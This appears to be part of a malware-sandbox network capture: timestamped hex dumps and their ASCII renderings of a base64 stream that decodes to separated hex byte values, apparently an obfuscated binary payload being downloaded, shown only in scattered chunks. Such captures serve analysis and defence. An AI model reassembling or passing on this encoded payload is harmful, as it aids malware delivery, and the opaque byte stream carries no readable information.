                                      2021-12-02 17:36:08 UTC735INData Raw: 51 6b 51 73 59 44 55 34 4c 47 41 7a 4d 69 78 67 52 54 45 73 59 44 41 31 4c 47 42 47 4e 43 78 67 51 6b 4d 73 59 45 46 47 4c 47 41 31 4d 69 78 67 4d 6b 4d 73 59 44 46 46 4c 47 41 34 4f 43 78 67 4e 54 67 73 59 44 49 33 4c 47 42 44 51 79 78 67 4f 45 55 73 59 45 51 77 4c 47 41 31 4e 53 78 67 52 6a 67 73 59 44 52 47 4c 47 41 30 4e 69 78 67 4f 44 67 73 59 44 63 33 4c 47 42 44 4e 53 78 67 52 44 59 73 59 45 56 47 4c 47 41 7a 4d 79 78 67 4d 54 55 73 59 44 51 30 4c 47 41 78 4d 79 78 67 4d 54 6b 73 59 44 5a 43 4c 47 41 79 4d 53 78 67 51 6b 51 73 59 44 45 34 4c 47 41 34 52 53 78 67 51 6a 6b 73 59 44 59 33 4c 47 42 43 4e 53 78 67 4f 55 55 73 59 45 59 34 4c 47 42 46 4e 79 78 67 4d 6a 49 73 59 44 55 7a 4c 47 42 46 51 79 78 67 51 6a 55 73 59 45 5a 47 4c 47 41 35 4e 69 78
                                      Data Ascii: QkQsYDU4LGAzMixgRTEsYDA1LGBGNCxgQkMsYEFGLGA1MixgMkMsYDFFLGA4OCxgNTgsYDI3LGBDQyxgOEUsYEQwLGA1NSxgRjgsYDRGLGA0NixgODgsYDc3LGBDNSxgRDYsYEVGLGAzMyxgMTUsYDQ0LGAxMyxgMTksYDZCLGAyMSxgQkQsYDE4LGA4RSxgQjksYDY3LGBCNSxgOUUsYEY4LGBFNyxgMjIsYDUzLGBFQyxgQjUsYEZGLGA5Nix
                                      2021-12-02 17:36:08 UTC751INData Raw: 4f 45 45 73 59 44 6b 31 4c 47 42 46 4d 53 78 67 4d 54 67 73 59 44 6b 33 4c 47 41 32 4e 53 78 67 4e 55 45 73 59 44 4d 79 4c 47 41 31 52 43 78 67 4d 30 49 73 59 45 5a 44 4c 47 41 33 52 69 78 67 51 6a 59 73 59 44 67 32 4c 47 41 79 51 53 78 67 4e 54 4d 73 59 44 6b 79 4c 47 42 46 4f 53 78 67 4d 7a 51 73 59 44 4d 78 4c 47 42 42 4e 69 78 67 52 6a 67 73 59 44 59 79 4c 47 41 30 4d 69 78 67 4d 54 55 73 59 44 68 44 4c 47 41 32 4d 43 78 67 4f 55 59 73 59 44 64 43 4c 47 41 34 4e 69 78 67 52 54 55 73 59 44 45 78 4c 47 41 7a 52 69 78 67 52 44 63 73 59 44 63 35 4c 47 42 42 4d 43 78 67 51 6b 59 73 59 45 4d 32 4c 47 41 32 52 69 78 67 4e 30 55 73 59 45 4d 77 4c 47 41 33 4f 43 78 67 51 30 45 73 59 45 4d 34 4c 47 41 34 4d 43 78 67 51 54 45 73 59 44 63 34 4c 47 41 33 51 79 78
                                      Data Ascii: OEEsYDk1LGBFMSxgMTgsYDk3LGA2NSxgNUEsYDMyLGA1RCxgM0IsYEZDLGA3RixgQjYsYDg2LGAyQSxgNTMsYDkyLGBFOSxgMzQsYDMxLGBBNixgRjgsYDYyLGA0MixgMTUsYDhDLGA2MCxgOUYsYDdCLGA4NixgRTUsYDExLGAzRixgRDcsYDc5LGBBMCxgQkYsYEM2LGA2RixgN0UsYEMwLGA3OCxgQ0EsYEM4LGA4MCxgQTEsYDc4LGA3Qyx
                                      2021-12-02 17:36:08 UTC767INData Raw: 52 44 59 73 59 45 4a 43 4c 47 41 30 4e 53 78 67 4e 30 59 73 59 44 52 43 4c 47 41 77 4e 69 78 67 4f 44 51 73 59 45 55 7a 4c 47 42 42 4f 43 78 67 52 45 59 73 59 44 56 44 4c 47 42 45 4e 69 78 67 51 30 45 73 59 44 67 30 4c 47 42 42 52 69 78 67 4f 44 41 73 59 45 56 43 4c 47 42 42 52 69 78 67 52 6a 45 73 59 44 5a 43 4c 47 41 7a 4e 79 78 67 51 55 45 73 59 44 49 31 4c 47 41 34 4e 53 78 67 52 44 4d 73 59 45 4d 30 4c 47 41 35 4e 79 78 67 4d 7a 45 73 59 44 64 46 4c 47 41 35 52 43 78 67 51 55 4d 73 59 44 56 44 4c 47 42 46 51 79 78 67 4d 7a 4d 73 59 44 45 30 4c 47 41 34 52 43 78 67 4d 44 6b 73 59 44 45 30 4c 47 41 33 51 69 78 67 51 7a 6b 73 59 44 4a 47 4c 47 41 34 4f 53 78 67 4e 7a 59 73 59 44 67 32 4c 47 41 31 52 43 78 67 4d 54 45 73 59 45 46 43 4c 47 41 79 51 53 78
                                      Data Ascii: RDYsYEJCLGA0NSxgN0YsYDRCLGAwNixgODQsYEUzLGBBOCxgREYsYDVDLGBENixgQ0EsYDg0LGBBRixgODAsYEVCLGBBRixgRjEsYDZCLGAzNyxgQUEsYDI1LGA4NSxgRDMsYEM0LGA5NyxgMzEsYDdFLGA5RCxgQUMsYDVDLGBFQyxgMzMsYDE0LGA4RCxgMDksYDE0LGA3QixgQzksYDJGLGA4OSxgNzYsYDg2LGA1RCxgMTEsYEFCLGAyQSx
                                      2021-12-02 17:36:08 UTC783INData Raw: 4f 54 4d 73 59 44 6b 78 4c 47 42 44 4e 69 78 67 4d 44 4d 73 59 45 52 43 4c 47 42 42 4d 79 78 67 52 44 67 73 59 44 55 32 4c 47 41 77 4d 79 78 67 4f 44 63 73 59 45 52 43 4c 47 41 78 52 53 78 67 4f 44 4d 73 59 45 52 47 4c 47 42 44 4e 53 78 67 4e 6b 45 73 59 45 56 46 4c 47 42 43 4d 69 78 67 4d 45 4d 73 59 44 41 77 4c 47 42 46 51 69 78 67 4e 54 4d 73 59 44 6b 32 4c 47 41 77 4d 69 78 67 4e 54 6b 73 59 44 55 35 4c 47 41 33 51 69 78 67 51 7a 49 73 59 44 63 30 4c 47 41 77 4d 43 78 67 4e 44 59 73 59 44 52 47 4c 47 42 43 4f 53 78 67 4f 54 63 73 59 45 45 33 4c 47 41 77 51 53 78 67 52 6b 49 73 59 44 41 35 4c 47 42 45 4d 79 78 67 51 7a 67 73 59 44 59 31 4c 47 41 7a 4d 43 78 67 4e 6a 55 73 59 44 6c 45 4c 47 41 31 4e 69 78 67 52 6a 41 73 59 44 41 7a 4c 47 41 30 4e 43 78
                                      Data Ascii: OTMsYDkxLGBDNixgMDMsYERCLGBBMyxgRDgsYDU2LGAwMyxgODcsYERCLGAxRSxgODMsYERGLGBDNSxgNkEsYEVFLGBCMixgMEMsYDAwLGBFQixgNTMsYDk2LGAwMixgNTksYDU5LGA3QixgQzIsYDc0LGAwMCxgNDYsYDRGLGBCOSxgOTcsYEE3LGAwQSxgRkIsYDA5LGBEMyxgQzgsYDY1LGAzMCxgNjUsYDlELGA1NixgRjAsYDAzLGA0NCx
                                      2021-12-02 17:36:08 UTC799INData Raw: 4e 6a 49 73 59 44 56 42 4c 47 42 45 4d 53 78 67 4f 44 51 73 59 45 4d 79 4c 47 42 44 51 69 78 67 4e 6a 59 73 59 44 6c 45 4c 47 42 45 4d 69 78 67 4e 44 51 73 59 45 46 46 4c 47 42 44 4d 69 78 67 52 45 51 73 59 45 4a 44 4c 47 41 31 51 53 78 67 52 6b 45 73 59 44 56 43 4c 47 41 77 51 69 78 67 52 6a 63 73 59 44 46 45 4c 47 41 7a 4d 43 78 67 4f 54 51 73 59 44 46 45 4c 47 42 47 52 53 78 67 52 6a 51 73 59 45 4a 46 4c 47 42 47 4d 69 78 67 51 54 41 73 59 45 55 30 4c 47 42 46 51 53 78 67 4e 6a 55 73 59 45 51 31 4c 47 41 34 4d 43 78 67 4e 44 63 73 59 45 45 33 4c 47 42 42 51 69 78 67 51 54 49 73 59 45 4d 79 4c 47 41 78 4d 79 78 67 52 54 49 73 59 44 42 47 4c 47 41 35 4f 53 78 67 51 6a 6b 73 59 44 45 77 4c 47 41 35 51 69 78 67 4f 44 55 73 59 44 63 32 4c 47 42 47 4e 79 78
                                      Data Ascii: NjIsYDVBLGBEMSxgODQsYEMyLGBDQixgNjYsYDlELGBEMixgNDQsYEFFLGBDMixgREQsYEJDLGA1QSxgRkEsYDVCLGAwQixgRjcsYDFELGAzMCxgOTQsYDFELGBGRSxgRjQsYEJFLGBGMixgQTAsYEU0LGBFQSxgNjUsYEQ1LGA4MCxgNDcsYEE3LGBBQixgQTIsYEMyLGAxMyxgRTIsYDBGLGA5OSxgQjksYDEwLGA5QixgODUsYDc2LGBGNyx
                                      2021-12-02 17:36:08 UTC815INData Raw: 4d 54 67 73 59 45 52 46 4c 47 41 33 52 43 78 67 4d 6b 55 73 59 44 6b 34 4c 47 41 34 4f 53 78 67 4e 30 4d 73 59 44 59 7a 4c 47 42 47 52 53 78 67 4f 55 51 73 59 44 67 30 4c 47 41 77 4f 53 78 67 4f 45 55 73 59 45 4a 43 4c 47 41 34 51 79 78 67 4f 55 59 73 59 45 55 30 4c 47 41 31 4e 79 78 67 52 55 59 73 59 45 56 43 4c 47 41 30 51 79 78 67 4e 6a 4d 73 59 45 5a 44 4c 47 41 79 4d 69 78 67 4f 45 59 73 59 44 6b 34 4c 47 41 78 51 69 78 67 52 44 45 73 59 44 68 46 4c 47 42 46 4d 43 78 67 4d 45 49 73 59 44 55 77 4c 47 41 78 4f 53 78 67 4d 7a 4d 73 59 44 4a 47 4c 47 41 35 4f 53 78 67 4d 6a 55 73 59 45 59 78 4c 47 42 46 51 53 78 67 52 44 45 73 59 44 55 32 4c 47 41 32 4e 43 78 67 4d 45 45 73 59 45 4a 46 4c 47 41 34 4f 53 78 67 51 55 4d 73 59 44 6b 7a 4c 47 41 34 4f 53 78
                                      Data Ascii: MTgsYERFLGA3RCxgMkUsYDk4LGA4OSxgN0MsYDYzLGBGRSxgOUQsYDg0LGAwOSxgOEUsYEJCLGA4QyxgOUYsYEU0LGA1NyxgRUYsYEVCLGA0QyxgNjMsYEZDLGAyMixgOEYsYDk4LGAxQixgRDEsYDhFLGBFMCxgMEIsYDUwLGAxOSxgMzMsYDJGLGA5OSxgMjUsYEYxLGBFQSxgRDEsYDU2LGA2NCxgMEEsYEJFLGA4OSxgQUMsYDkzLGA4OSx
                                      2021-12-02 17:36:08 UTC831INData Raw: 52 6a 67 73 59 44 49 34 4c 47 41 78 4d 69 78 67 4e 54 6b 73 59 44 67 34 4c 47 41 31 4e 53 78 67 4f 54 51 73 59 45 46 44 4c 47 42 46 4d 69 78 67 51 55 59 73 59 45 4d 35 4c 47 41 33 4f 53 78 67 4e 7a 6b 73 59 44 6b 78 4c 47 42 44 51 53 78 67 4f 44 63 73 59 45 5a 44 4c 47 41 78 52 69 78 67 52 6a 51 73 59 44 68 46 4c 47 42 46 4f 43 78 67 4d 55 45 73 59 45 59 30 4c 47 41 79 4e 69 78 67 4e 54 45 73 59 44 67 34 4c 47 42 43 51 79 78 67 4f 45 51 73 59 45 59 32 4c 47 41 77 52 69 78 67 52 55 51 73 59 44 4d 34 4c 47 42 47 4d 43 78 67 51 6b 51 73 59 45 51 78 4c 47 41 77 52 69 78 67 51 54 49 73 59 44 42 45 4c 47 41 79 4e 53 78 67 4e 55 59 73 59 45 4e 46 4c 47 41 32 51 69 78 67 51 54 67 73 59 45 46 42 4c 47 41 30 4d 53 78 67 4f 45 51 73 59 44 4a 47 4c 47 41 79 4d 69 78
                                      Data Ascii: RjgsYDI4LGAxMixgNTksYDg4LGA1NSxgOTQsYEFDLGBFMixgQUYsYEM5LGA3OSxgNzksYDkxLGBDQSxgODcsYEZDLGAxRixgRjQsYDhFLGBFOCxgMUEsYEY0LGAyNixgNTEsYDg4LGBCQyxgOEQsYEY2LGAwRixgRUQsYDM4LGBGMCxgQkQsYEQxLGAwRixgQTIsYDBELGAyNSxgNUYsYENFLGA2QixgQTgsYEFBLGA0MSxgOEQsYDJGLGAyMix
                                      2021-12-02 17:36:08 UTC847INData Raw: 4e 54 49 73 59 45 45 79 4c 47 41 35 52 53 78 67 52 6a 51 73 59 44 5a 47 4c 47 41 79 4f 53 78 67 4f 54 51 73 59 44 4e 46 4c 47 42 46 4d 43 78 67 4e 54 45 73 59 45 56 44 4c 47 41 7a 4d 69 78 67 51 7a 55 73 59 44 41 31 4c 47 41 30 51 69 78 67 51 7a 41 73 59 44 45 7a 4c 47 41 30 51 69 78 67 4d 6b 51 73 59 44 63 7a 4c 47 41 32 52 69 78 67 4d 7a 51 73 59 44 67 33 4c 47 41 32 4e 43 78 67 4d 7a 45 73 59 45 4d 30 4c 47 41 7a 4d 69 78 67 51 6a 41 73 59 44 52 46 4c 47 41 31 4e 79 78 67 51 6b 45 73 59 44 46 42 4c 47 41 31 51 69 78 67 4d 45 51 73 59 45 46 46 4c 47 42 44 4d 43 78 67 4f 45 4d 73 59 45 4e 43 4c 47 41 30 4f 43 78 67 51 7a 51 73 59 44 55 79 4c 47 42 45 52 53 78 67 52 54 4d 73 59 45 49 78 4c 47 41 32 52 69 78 67 4e 7a 4d 73 59 44 46 43 4c 47 41 79 4d 79 78
                                      Data Ascii: NTIsYEEyLGA5RSxgRjQsYDZGLGAyOSxgOTQsYDNFLGBFMCxgNTEsYEVDLGAzMixgQzUsYDA1LGA0QixgQzAsYDEzLGA0QixgMkQsYDczLGA2RixgMzQsYDg3LGA2NCxgMzEsYEM0LGAzMixgQjAsYDRFLGA1NyxgQkEsYDFBLGA1QixgMEQsYEFFLGBDMCxgOEMsYENCLGA0OCxgQzQsYDUyLGBERSxgRTMsYEIxLGA2RixgNzMsYDFCLGAyMyx
                                      2021-12-02 17:36:08 UTC863INData Raw: 4f 55 55 73 59 44 49 77 4c 47 42 47 52 53 78 67 52 6b 49 73 59 44 64 47 4c 47 42 47 4f 43 78 67 4f 44 63 73 59 44 46 46 4c 47 42 47 51 79 78 67 51 7a 63 73 59 44 64 47 4c 47 41 34 52 69 78 67 4d 44 4d 73 59 44 64 45 4c 47 42 47 4d 69 78 67 4d 45 59 73 59 45 5a 45 4c 47 41 7a 4e 69 78 67 4e 30 59 73 59 45 51 32 4c 47 41 78 52 69 78 67 52 54 55 73 59 44 56 42 4c 47 42 47 52 69 78 67 52 6b 49 73 59 45 5a 47 4c 47 42 45 4d 43 78 67 52 6b 59 73 59 45 5a 46 4c 47 41 30 4e 79 78 67 52 6b 51 73 59 44 56 47 4c 47 42 43 52 69 78 67 4d 6a 6b 73 59 44 55 7a 4c 47 41 35 52 43 78 67 52 6b 59 73 59 45 5a 46 4c 47 41 34 52 69 78 67 52 6b 59 73 59 45 45 78 4c 47 41 7a 52 69 78 67 52 55 45 73 59 44 4e 47 4c 47 42 47 52 43 78 67 4e 55 49 73 59 44 64 46 4c 47 41 31 4d 79 78
                                      Data Ascii: OUUsYDIwLGBGRSxgRkIsYDdGLGBGOCxgODcsYDFFLGBGQyxgQzcsYDdGLGA4RixgMDMsYDdELGBGMixgMEYsYEZELGAzNixgN0YsYEQ2LGAxRixgRTUsYDVBLGBGRixgRkIsYEZGLGBEMCxgRkYsYEZFLGA0NyxgRkQsYDVGLGBCRixgMjksYDUzLGA5RCxgRkYsYEZFLGA4RixgRkYsYEExLGAzRixgRUEsYDNGLGBGRCxgNUIsYDdFLGA1Myx
                                      2021-12-02 17:36:08 UTC879INData Raw: 51 6b 59 73 59 45 4d 7a 4c 47 41 78 52 53 78 67 52 6b 59 73 59 45 59 79 4c 47 42 46 52 53 78 67 4f 55 59 73 59 45 5a 44 4c 47 42 47 52 53 78 67 4f 55 59 73 59 45 4d 33 4c 47 42 43 52 69 78 67 52 6b 4d 73 59 44 46 42 4c 47 42 47 52 69 78 67 52 54 55 73 59 45 56 46 4c 47 42 43 52 69 78 67 51 7a 45 73 59 45 4a 47 4c 47 41 7a 51 79 78 67 52 6b 59 73 59 45 4e 45 4c 47 42 47 52 69 78 67 52 44 6b 73 59 45 4a 47 4c 47 41 35 4e 53 78 67 4e 30 59 73 59 45 59 35 4c 47 41 78 4d 79 78 67 52 6b 59 73 59 45 4a 42 4c 47 42 43 52 69 78 67 4e 55 45 73 59 44 64 46 4c 47 42 47 4f 53 78 67 52 54 63 73 59 44 64 46 4c 47 41 35 4d 79 78 67 52 6a 45 73 59 44 6b 33 4c 47 42 47 51 79 78 67 51 30 49 73 59 45 4a 47 4c 47 42 47 51 53 78 67 51 6a 63 73 59 45 5a 46 4c 47 41 78 4d 79 78
                                      Data Ascii: QkYsYEMzLGAxRSxgRkYsYEYyLGBFRSxgOUYsYEZDLGBGRSxgOUYsYEM3LGBCRixgRkMsYDFBLGBGRixgRTUsYEVFLGBCRixgQzEsYEJGLGAzQyxgRkYsYENELGBGRixgRDksYEJGLGA5NSxgN0YsYEY5LGAxMyxgRkYsYEJBLGBCRixgNUEsYDdFLGBGOSxgRTcsYDdFLGA5MyxgRjEsYDk3LGBGQyxgQ0IsYEJGLGBGQSxgQjcsYEZFLGAxMyx
                                      2021-12-02 17:36:08 UTC895INData Raw: 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41
                                      Data Ascii: MCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGA
                                      2021-12-02 17:36:08 UTC911INData Raw: 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41
                                      Data Ascii: MCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGA
                                      2021-12-02 17:36:08 UTC919INData Raw: 51 69 78 67 4f 45 49 73 59 45 55 31 4c 47 41 31 52 43 78 67 51 7a 4d 73 59 45 4e 46 4c 47 41 30 51 79 78 67 4d 54 51 73 59 45 55 7a 4c 47 41 7a 4d 43 78 67 4f 45 59 73 59 44 55 77 4c 47 41 32 4e 43 78 67 4e 54 45 73 59 44 64 44 4c 47 42 45 4d 43 78 67 4e 44 67 73 59 45 49 32 4c 47 41 31 4f 53 78 67 4e 54 67 73 59 44 55 31 4c 47 41 34 51 69 78 67 52 55 4d 73 59 44 68 43 4c 47 41 30 4e 53 78 67 4d 54 41 73 59 44 68 43 4c 47 41 30 52 43 78 67 4d 45 4d 73 59 44 67 7a 4c 47 42 46 51 79 78 67 4e 44 41 73 59 44 55 7a 4c 47 41 34 51 69 78 67 4e 55 51 73 59 44 41 34 4c 47 41 31 4e 79 78 67 4e 54 41 73 59 44 55 78 4c 47 41 31 4d 79 78 67 52 54 67 73 59 45 51 33 4c 47 41 78 52 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 51 69 78 67 52 6a 67 73 59 44 67 7a 4c 47 42
                                      Data Ascii: QixgOEIsYEU1LGA1RCxgQzMsYENFLGA0QyxgMTQsYEUzLGAzMCxgOEYsYDUwLGA2NCxgNTEsYDdDLGBEMCxgNDgsYEI2LGA1OSxgNTgsYDU1LGA4QixgRUMsYDhCLGA0NSxgMTAsYDhCLGA0RCxgMEMsYDgzLGBFQyxgNDAsYDUzLGA4QixgNUQsYDA4LGA1NyxgNTAsYDUxLGA1MyxgRTgsYEQ3LGAxRixgMDAsYDAwLGA4QixgRjgsYDgzLGB
                                      2021-12-02 17:36:08 UTC935INData Raw: 4e 43 78 67 51 7a 63 73 59 44 67 31 4c 47 41 32 4e 43 78 67 52 6a 63 73 59 45 5a 47 4c 47 42 47 52 69 78 67 52 44 4d 73 59 44 49 78 4c 47 41 33 4e 43 78 67 4e 54 67 73 59 45 4d 33 4c 47 41 34 4e 53 78 67 4e 6a 67 73 59 45 59 33 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 49 35 4c 47 41 32 4f 53 78 67 52 54 41 73 59 44 51 35 4c 47 42 44 4e 79 78 67 4f 44 55 73 59 44 5a 44 4c 47 42 47 4e 79 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 30 4e 43 78 67 51 7a 67 73 59 45 4d 35 4c 47 41 34 52 53 78 67 51 7a 63 73 59 44 67 31 4c 47 41 33 4d 43 78 67 52 6a 63 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4e 6b 45 73 59 44 67 35 4c 47 42 44 4d 69 78 67 4e 7a 55 73 59 45 4d 33 4c 47 41 34 4e 53 78 67 4e 7a 51 73 59 45 59 33 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 63 34 4c 47 41
                                      Data Ascii: NCxgQzcsYDg1LGA2NCxgRjcsYEZGLGBGRixgRDMsYDIxLGA3NCxgNTgsYEM3LGA4NSxgNjgsYEY3LGBGRixgRkYsYDI5LGA2OSxgRTAsYDQ5LGBDNyxgODUsYDZDLGBGNyxgRkYsYEZGLGA0NCxgQzgsYEM5LGA4RSxgQzcsYDg1LGA3MCxgRjcsYEZGLGBGRixgNkEsYDg5LGBDMixgNzUsYEM3LGA4NSxgNzQsYEY3LGBGRixgRkYsYDc4LGA
                                      2021-12-02 17:36:08 UTC951INData Raw: 51 69 78 67 52 6b 55 73 59 44 67 35 4c 47 41 33 51 53 78 67 4d 44 51 73 59 44 68 43 4c 47 41 33 4d 53 78 67 4d 44 67 73 59 44 68 43 4c 47 42 47 52 53 78 67 51 7a 45 73 59 45 4e 47 4c 47 41 77 4f 43 78 67 4f 44 45 73 59 45 55 33 4c 47 41 77 4d 43 78 67 52 6b 59 73 59 44 41 77 4c 47 42 47 52 69 78 67 51 7a 45 73 59 45 4d 32 4c 47 41 77 4f 43 78 67 4f 44 45 73 59 45 55 32 4c 47 42 47 52 69 78 67 4d 44 41 73 59 45 5a 47 4c 47 41 77 4d 43 78 67 4d 45 49 73 59 45 5a 46 4c 47 41 34 4f 53 78 67 4e 30 45 73 59 44 41 34 4c 47 41 34 51 69 78 67 4e 7a 45 73 59 44 42 44 4c 47 41 34 52 43 78 67 4e 44 49 73 59 44 41 30 4c 47 41 34 51 69 78 67 52 6b 55 73 59 45 4d 78 4c 47 42 44 52 69 78 67 4d 44 67 73 59 44 67 78 4c 47 42 46 4e 79 78 67 4d 44 41 73 59 45 5a 47 4c 47 41
                                      Data Ascii: QixgRkUsYDg5LGA3QSxgMDQsYDhCLGA3MSxgMDgsYDhCLGBGRSxgQzEsYENGLGAwOCxgODEsYEU3LGAwMCxgRkYsYDAwLGBGRixgQzEsYEM2LGAwOCxgODEsYEU2LGBGRixgMDAsYEZGLGAwMCxgMEIsYEZFLGA4OSxgN0EsYDA4LGA4QixgNzEsYDBDLGA4RCxgNDIsYDA0LGA4QixgRkUsYEMxLGBDRixgMDgsYDgxLGBFNyxgMDAsYEZGLGA
                                      2021-12-02 17:36:08 UTC967INData Raw: 4d 43 78 67 4d 44 41 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 44 67 73 59 44 56 47 4c 47 41 31 52 53 78 67 4d 7a 4d 73 59 45 4d 77 4c 47 41 31 51 69 78 67 4f 45 49 73 59 45 55 31 4c 47 41 31 52 43 78 67 51 7a 4d 73 59 44 67 77 4c 47 42 47 4f 53 78 67 4d 7a 63 73 59 44 63 31 4c 47 41 79 4d 69 78 67 4f 45 49 73 59 44 67 33 4c 47 41 7a 4f 43 78 67 4d 45 49 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 44 45 73 59 44 4d 34 4c 47 41 30 4e 69 78 67 4e 44 49 73 59 44 52 46 4c 47 41 30 4e 79 78 67 4e 7a 55 73 59 44 42 43 4c 47 41 32 51 53 78 67 4d 54 67 73 59 44 55 33 4c 47 42 46 4f 43 78 67 4f 45 49 73 59 44 42 43 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 44 67 73 59 44 56 47 4c 47 41 31 52 53 78 67 4d 7a 4d 73 59 45 4d 77 4c 47 41
                                      Data Ascii: MCxgMDAsYDgzLGBDNCxgMDgsYDVGLGA1RSxgMzMsYEMwLGA1QixgOEIsYEU1LGA1RCxgQzMsYDgwLGBGOSxgMzcsYDc1LGAyMixgOEIsYDg3LGAzOCxgMEIsYDAwLGAwMCxgODEsYDM4LGA0NixgNDIsYDRFLGA0NyxgNzUsYDBCLGA2QSxgMTgsYDU3LGBFOCxgOEIsYDBCLGAwMCxgMDAsYDgzLGBDNCxgMDgsYDVGLGA1RSxgMzMsYEMwLGA
                                      2021-12-02 17:36:08 UTC983INData Raw: 4e 69 78 67 4e 6b 45 73 59 44 4e 45 4c 47 41 31 4e 79 78 67 52 54 67 73 59 45 46 43 4c 47 42 42 51 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 51 69 78 67 4e 44 55 73 59 44 42 44 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 41 34 4c 47 41 32 4f 43 78 67 4d 44 45 73 59 44 41 77 4c 47 41 77 4e 43 78 67 4f 44 41 73 59 44 55 77 4c 47 42 47 52 69 78 67 52 44 59 73 59 44 56 47 4c 47 41 7a 4d 79 78 67 51 7a 41 73 59 44 56 46 4c 47 41 34 51 69 78 67 52 54 55 73 59 44 56 45 4c 47 42 44 4d 79 78 67 51 7a 4d 73 59 44 68 47 4c 47 42 46 52 69 78 67 4d 7a 4d 73 59 44 4d 78 4c 47 41 31 4e 53 78 67 4f 45 49 73 59 45 56 44 4c 47 41 34 4d 53 78 67 52 55 4d 73 59 44 59 77 4c 47 41 77 4e 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 31 4d 79 78 67 4e 54 63 73 59 44 68 43 4c 47 41
                                      Data Ascii: NixgNkEsYDNELGA1NyxgRTgsYEFCLGBBQixgMDAsYDAwLGA4QixgNDUsYDBDLGA4MyxgQzQsYDA4LGA2OCxgMDEsYDAwLGAwNCxgODAsYDUwLGBGRixgRDYsYDVGLGAzMyxgQzAsYDVFLGA4QixgRTUsYDVELGBDMyxgQzMsYDhGLGBFRixgMzMsYDMxLGA1NSxgOEIsYEVDLGA4MSxgRUMsYDYwLGAwNCxgMDAsYDAwLGA1MyxgNTcsYDhCLGA
                                      2021-12-02 17:36:08 UTC999INData Raw: 4e 43 78 67 4d 45 49 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 55 55 73 59 44 63 32 4c 47 41 78 51 53 78 67 4d 7a 6b 73 59 44 6c 46 4c 47 42 45 51 79 78 67 4d 6a 41 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4e 7a 51 73 59 44 45 79 4c 47 41 31 4e 69 78 67 4f 44 6b 73 59 44 56 47 4c 47 41 79 51 79 78 67 52 54 67 73 59 44 6c 44 4c 47 41 35 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 41 30 4c 47 41 34 4f 53 78 67 4f 55 55 73 59 44 59 30 4c 47 41 77 51 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 7a 4f 53 78 67 4e 55 59 73 59 44 45 77 4c 47 41 33 4e 53 78 67 4d 7a 49 73 59 44 4d 35 4c 47 41 31 52 69 78 67 4d 55 4d 73 59 44 63 31 4c 47 41 79 52 43 78 67 4f 44 45 73 59 45 4a 46 4c 47 41 32 4f 43 78 67 4d 45 49 73 59 44 41 77 4c 47 41
